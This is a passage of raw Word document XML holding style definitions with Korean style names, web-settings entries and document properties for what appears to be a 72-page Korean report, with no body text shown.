    <w:name w:val="본문 Level 4 내용 [Alt+4]"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="009B0F0F"/>
    <w:pPr>
      <w:wordWrap/>
      <w:ind w:left="1276" w:rightChars="141" w:right="282"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:noProof/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af1">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char5">
    <w:name w:val="메모 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="af2"/>
    <w:next w:val="af2"/>
    <w:link w:val="Char6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char6">
    <w:name w:val="메모 주제 Char"/>
    <w:basedOn w:val="Char5"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char7">
    <w:name w:val="풍선 도움말 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level4URL">
    <w:name w:val="본문 Level 4 URL"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Level4URLChar"/>
    <w:qFormat/>
    <w:rsid w:val="003B4450"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
      <w:wordWrap/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:snapToGrid/>
      <w:ind w:left="1276" w:rightChars="70" w:right="140"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Level4URLChar">
    <w:name w:val="본문 Level 4 URL Char"/>
    <w:link w:val="Level4URL"/>
    <w:rsid w:val="003B4450"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D352BC"/>
    <w:pPr>
      <w:widowControl/>
      <w:wordWrap/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:snapToGrid/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림" w:cs="굴림"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="40">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE783C"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="600" w:left="1275"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE783C"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="800" w:left="1700"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE783C"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="1000" w:left="2125"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE783C"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="1200" w:left="2550"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE783C"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="1400" w:left="2975"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE783C"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="1600" w:left="3400"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
    <w:name w:val="스타일 본문-동그라미 + (기호) 굴림체"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00F562BF"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="1923"/>
        <w:tab w:val="num" w:pos="360"/>
      </w:tabs>
      <w:kinsoku w:val="0"/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:snapToGrid/>
      <w:spacing w:before="120" w:line="360" w:lineRule="exact"/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="jun2">
    <w:name w:val="jun_2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="jun2Char"/>
    <w:qFormat/>
    <w:rsid w:val="001C31CE"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="108"/>
      <w:ind w:right="198"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="jun3">
    <w:name w:val="jun_3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="jun3Char"/>
    <w:qFormat/>
    <w:rsid w:val="001C31CE"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="300" w:lineRule="atLeast"/>
      <w:ind w:leftChars="300" w:left="600"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="jun2Char">
    <w:name w:val="jun_2 Char"/>
    <w:link w:val="jun2"/>
    <w:rsid w:val="001C31CE"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="jun3Char">
    <w:name w:val="jun_3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="jun3"/>
    <w:rsid w:val="001C31CE"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="본문 (수준1)"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="000448F9"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:ind w:leftChars="150" w:left="300"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="본문 (수준4)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="4Char0"/>
    <w:rsid w:val="00B14512"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:ind w:leftChars="650" w:left="1300"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char0">
    <w:name w:val="본문 (수준4) Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="41"/>
    <w:rsid w:val="00B14512"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af6">
    <w:name w:val="표_헤더(대)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char8"/>
    <w:rsid w:val="00B14512"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char8">
    <w:name w:val="표_헤더(대) Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af6"/>
    <w:rsid w:val="00B14512"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="굴림체" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af7">
    <w:name w:val="본문 보고서(그 외)"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char9"/>
    <w:qFormat/>
    <w:rsid w:val="0016533F"/>
    <w:pPr>
      <w:snapToGrid/>
      <w:ind w:leftChars="200" w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char9">
    <w:name w:val="본문 보고서(그 외) Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af7"/>
    <w:rsid w:val="0016533F"/>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Chara"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00AD774D"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Chara">
    <w:name w:val="제목 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af8"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00AD774D"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="Charb"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="007C3FE3"/>
    <w:pPr>
      <w:spacing w:after="60"/>
      <w:ind w:leftChars="100" w:left="100"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Charb">
    <w:name w:val="부제 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="007C3FE3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1">
    <w:name w:val="스타일1"/>
    <w:basedOn w:val="a7"/>
    <w:link w:val="1Char0"/>
    <w:qFormat/>
    <w:rsid w:val="004E422B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:ind w:left="284" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="목록 단락 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00F13AA6"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char0">
    <w:name w:val="스타일1 Char"/>
    <w:basedOn w:val="Char2"/>
    <w:link w:val="1"/>
    <w:rsid w:val="004E422B"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afa">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A123DD"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00222C3D"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="link-annotation-unknown-block-id-1057648865">
    <w:name w:val="link-annotation-unknown-block-id-1057648865"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002D6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388333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="936987837">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1230654328">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1467896972">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1635018997">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1780681830">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="195887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4301-3D1A-41D8-97F7-3B8EA778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TotalTime>
  <Pages>72</Pages>
  <Words>6251</Words>
  <Characters>35636</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>296</Lines>
  <Paragraphs>83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종우 박</cp:lastModifiedBy>
  <cp:revision>890</cp:revision>
  <cp:lastPrinted>2025-09-18T06:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-18T07:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-18T06:26:00Z</dcterms:modified>
  <cp:contentStatus/>
</cp:coreProperties>
</file>